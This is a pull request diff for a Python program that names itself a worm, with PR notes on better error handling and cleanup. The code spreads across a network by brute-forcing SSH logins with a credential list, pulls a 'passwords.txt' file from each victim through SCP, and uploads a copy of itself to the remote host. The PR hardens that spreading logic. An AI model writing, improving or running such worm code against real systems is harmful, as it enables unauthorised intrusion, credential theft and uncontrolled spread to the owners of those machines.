### PR TITLE
ensure scp upload failure handled

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,1 @@
+virtualenv

--- a/worm/worm.py
+++ b/worm/worm.py
@@ -57,27 +57,33 @@ class Worm:
 
         for remote_address in self.generate_addresses_on_network():
             logging.debug('Trying to spread on the remote host: {}'.format(remote_address))
+
             for user, passw in self.credentials:
                 try:
                     ssh.connect(remote_address, port=22, username=user, password=passw, timeout=10)
                     logging.debug('The worm is succesfully connected to the remote host [{}, {}].'.format(user, passw))
 
                     # Create SCP client for file transmission.
-                    scp_client = scp.SCPClient(ssh.get_transport())
-                    # Obtain file with victim's passwords.
-                    try:
-                        scp_client.get('passwords.txt')
-                        logging.debug('The victim had passwords.txt')
-                    except Exception:
-                        logging.debug('The victim did not have passwords.txt')
+                    with scp.SCPClient(ssh.get_transport()) as scp_client:
+                        # Obtain file with victim's passwords.
+                        try:
+                            scp_client.get('passwords.txt')
+                            logging.debug('The victim had passwords.txt')
+                        except Exception:
+                            logging.debug('The victim did not have passwords.txt')
 
-                    # Upload worm to the remote host.
-                    scp_client.put(sys.argv[0])
+                        # Upload worm to the remote host.
+                        try:
+                            scp_client.put(sys.argv[0])
+                            logging.debug('The worm has been uploaded to victim')
+                        except Exception:
+                            logging.debug('The worm could not be uploaded to victim')
+
                     print()
-
                 except Exception:
                     logging.debug('The remote host refused connection with credentials {},{}.'.format(user, passw))
 
+        ssh.close()
 
 if __name__ == '__main__':
     logging.basicConfig(level=logging.DEBUG)

--- a/worm/worm.py
+++ b/worm/worm.py
@@ -57,6 +57,7 @@ class Worm:
 
         for remote_address in self.generate_addresses_on_network():
             logging.debug('Trying to spread on the remote host: {}'.format(remote_address))
+            print()
 
             for user, passw in self.credentials:
                 try:
@@ -82,6 +83,7 @@ class Worm:
                     print()
                 except Exception:
                     logging.debug('The remote host refused connection with credentials {},{}.'.format(user, passw))
+                    print()
 
         ssh.close()
 


### PR DESCRIPTION
Changes:
1. Ensure scp upload failure produces correct logging output
2. Ensure ssh and scp clients closed after usage
3. Add spacing between blocks of cli output
4. Add .gitignore for virtualenv